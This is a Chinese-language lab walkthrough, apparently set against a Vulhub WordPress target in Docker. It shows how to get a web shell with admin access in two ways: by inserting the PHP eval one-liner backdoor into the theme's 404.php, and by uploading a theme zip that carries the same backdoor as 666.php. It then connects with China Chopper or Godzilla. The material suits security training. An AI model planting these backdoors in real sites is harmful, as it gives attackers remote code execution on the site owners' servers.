第一步搭建环境
靶场地址,自行去gethub找
安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose
执行命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
开启docker
docker ps -a查看运行端口
访问进行wordpress设置
第二步 给404.php中写入一句话木马
搭建靶场后台
进行简单的网站后台设置后即可进入如下页面
思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php
在404.php中写入一句话木马,删除其原本文件(可选),并更新文件
<?php phpinfo();eval($_POST['cmd']);?>
访问以下路径可以访问到404.php文件
/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置
对木马使用你的武器库吧,这里小编选择了菜刀
是兄弟就来wordpress砍我!
第三步 这次我们换一个姿势,上传文件来上传木马
接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件
下载之后把一个木马文件添加到这个zip压缩包中
这里小编上传了一个666.php,内容如下
<?php phpinfo();eval($_POST['cmd']);?>
将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】
压缩文件中的文件名即为主题名
访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php对他使用你的哥斯拉吧
然而小编还是选择了菜刀,完